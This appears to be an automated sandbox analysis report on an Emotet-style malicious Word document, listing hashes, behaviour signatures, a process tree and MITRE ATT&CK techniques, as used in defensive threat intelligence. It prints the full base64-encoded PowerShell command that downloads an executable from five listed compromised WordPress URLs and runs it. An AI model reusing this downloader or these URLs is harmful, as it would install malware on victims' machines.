5318cc94acbffdb5f97fc8788fa2d7e3d91503cc17923feb2ea108f02bf70a5b

General

Target

a7cf16d4aaa376dd203bf2f9dc920119.doc
Size

195KB
MD5

a7cf16d4aaa376dd203bf2f9dc920119
SHA1

bea688ec17fc62fe01da919e32dec3044d708c59
SHA256

5318cc94acbffdb5f97fc8788fa2d7e3d91503cc17923feb2ea108f02bf70a5b
SHA512

c01f59d2da9b00dfc684f9fa5b5806d1efcf41ea11f4b2a22a71c3449ec469350b64a00f0377f058831e0dd291766acadee98e4a367d917d52e47bd13f248de9

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://www.elseelektrikci.com/wp-content/hedk3/

exe.dropper

https://www.rviradeals.com/wp-includes/LeDR/

exe.dropper

https://skenglish.com/wp-admin/o0gf/

exe.dropper

https://www.packersmoversmohali.com/wp-includes/pgmt4x/

exe.dropper

https://www.tri-comma.com/wp-admin/MmD/

Signatures

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
3544	WINWORD.EXE
3544	WINWORD.EXE

Blacklisted process makes network request 1 IoCs

flow	pid	Process
18	3916	powersheLL.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 3080 wrote to memory of 3820	3080	443.exe	78
PID 3080 wrote to memory of 3820	3080	443.exe	78
PID 3080 wrote to memory of 3820	3080	443.exe	78

Suspicious behavior: EmotetMutantsSpam 1 IoCs

pid	Process
3820	sppinst.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious use of SetWindowsHookEx 16 IoCs

pid	Process
3544	WINWORD.EXE
3544	WINWORD.EXE
3544	WINWORD.EXE
3544	WINWORD.EXE
3544	WINWORD.EXE
3544	WINWORD.EXE
3544	WINWORD.EXE
3544	WINWORD.EXE
3544	WINWORD.EXE
3544	WINWORD.EXE
3544	WINWORD.EXE
3544	WINWORD.EXE
3080	443.exe
3080	443.exe
3820	sppinst.exe
3820	sppinst.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3916	powersheLL.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
3916	powersheLL.exe
3916	powersheLL.exe
3916	powersheLL.exe
3820	sppinst.exe
3820	sppinst.exe
3820	sppinst.exe
3820	sppinst.exe
3820	sppinst.exe
3820	sppinst.exe

Executes dropped EXE 2 IoCs

pid	Process
3080	443.exe
3820	sppinst.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\cabinet\sppinst.exe	443.exe

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3916	916	powersheLL.exe	66

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a7cf16d4aaa376dd203bf2f9dc920119.doc" /o ""
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:3544

C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
powersheLL -e JABkAG8AdQBqAHcAaQBvAGgAYwBvAGkAcwBiAG8AYQBzAGwAaQBlAHAAPQAnAGgAZQBhAGQAcQB1AG8AZQB6AHkAdQB1AHYAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBgAGUAYwB1AFIAaQB0AHkAcABgAFIAbwB0AGAATwBjAE8AbAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAHQAYQBjAGgAagBhAGkAbgAgAD0AIAAnADQANAAzACcAOwAkAHAAbwB1AHYAZABvAGUAegB5AGkAbwB3AG0AYQB1AHEAdQBqAHUAdQB6AD0AJwB6AGkAbgAnADsAJABoAGEAbwBjAGgAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAHQAYQBjAGgAagBhAGkAbgArACcALgBlAHgAZQAnADsAJAByAGkAbwBmAHYAbwBhAHoAZgBlAGkAcQB1AGoAZQBqAGIAbwB1AHgAPQAnAGYAZQBpAGoAJwA7ACQAdABpAHQAaAB0AGgAbwBlAG4AeQB1AGEAdABoAGwAYQB1AHoAPQAmACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAG4AZQB0AC4AdwBFAGIAQwBMAGkAZQBOAFQAOwAkAGoAdQBhAGcAYgBpAG8AeQByAG8AYQBiAGMAbwBqAD0AJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBlAGwAcwBlAGUAbABlAGsAdAByAGkAawBjAGkALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBoAGUAZABrADMALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHIAdgBpAHIAYQBkAGUAYQBsAHMALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEwAZQBEAFIALwAqAGgAdAB0AHAAcwA6AC8ALwBzAGsAZQBuAGcAbABpAHMAaAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbwAwAGcAZgAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AcABhAGMAawBlAHIAcwBtAG8AdgBlAHIAcwBtAG8AaABhAGwAaQAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AcABnAG0AdAA0AHgALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHQAcgBpAC0AYwBvAG0AbQBhAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBNAG0ARAAvACcALgAiAHMAcABgAGwAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAeABpAG8AYwBoAGMAYQBoAGQAbwBkAHYAYQB3AHAAdQBhAGgAeQBvAGUAcQB1AD0AJwB0AGgAbwBhAGsAdgBlAGUAawBjAHUAYQBsACcAOwBmAG8AcgBlAGEAYwBoACgAJAB6AGEAbwBzAHYAdQBhAGgAdABoAG8AdQBtACAAaQBuACAAJABqAHUAYQBnAGIAaQBvAHkAcgBvAGEAYgBjAG8AagApAHsAdAByAHkAewAkAHQAaQB0AGgAdABoAG8AZQBuAHkAdQBhAHQAaABsAGEAdQB6AC4AIgBEAG8AYAB3AG4AbABvAGAAQQBgAEQAZgBpAGwAZQAiACgAJAB6AGEAbwBzAHYAdQBhAGgAdABoAG8AdQBtACwAIAAkAGgAYQBvAGMAaAApADsAJAB3AHUAYQBsAHkAaQBhAGMAaAA9ACcAeABlAHYAbgBvAGEAcQB1AGwAYQBvAGgAbABvAGUAZAB2AHUAYQBsAGYAaQBsACcAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQAaABhAG8AYwBoACkALgAiAGwAZQBgAE4ARwBgAFQAaAAiACAALQBnAGUAIAAyADYAMwAyADYAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAGMAYABSAGAAZQBhAHQARQAiACgAJABoAGEAbwBjAGgAKQA7ACQAbgBhAG4APQAnAHEAdQBhAG8AeABjAGgAZQBlAHcAdgBvAHUAdABoAGIAYQB1AGMAdgBhAG8AdABoACcAOwBiAHIAZQBhAGsAOwAkAHgAdQB1AGwAZwB1AHUAagA9ACcAdwBhAG8AawB5AGEAZQBuAG0AZQBvAHoAagBhAHUAdwBmAHUAdQBjAGMAaABpAGEAcwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB0AGgAaQBrAHQAaABpAG8AegBoAHUAbQA9ACcAdABhAGkAdwB2AGUAaQBjAHQAaQBjAGgAJwA=
1⤵
- Blacklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Process spawned unexpected child process
PID:3916

C:\Users\Admin\443.exe
C:\Users\Admin\443.exe
1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Drops file in System32 directory
PID:3080
- C:\Windows\SysWOW64\cabinet\sppinst.exe
  "C:\Windows\SysWOW64\cabinet\sppinst.exe"
  2⤵
  - Suspicious behavior: EmotetMutantsSpam
  - Suspicious use of SetWindowsHookEx
  - Suspicious behavior: EnumeratesProcesses
  - Executes dropped EXE
  PID:3820

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3080-6-0x0000000002210000-0x000000000221C000-memory.dmp

Filesize
48KB

Download
memory/3544-0-0x0000020833704000-0x000002083370D000-memory.dmp

Filesize
36KB

Download
memory/3544-1-0x0000020833704000-0x000002083370D000-memory.dmp

Filesize
36KB

Download
memory/3544-2-0x0000020833704000-0x000002083370D000-memory.dmp

Filesize
36KB

Download
memory/3820-9-0x00000000020D0000-0x00000000020DC000-memory.dmp

Filesize
48KB

Download
memory/3820-10-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads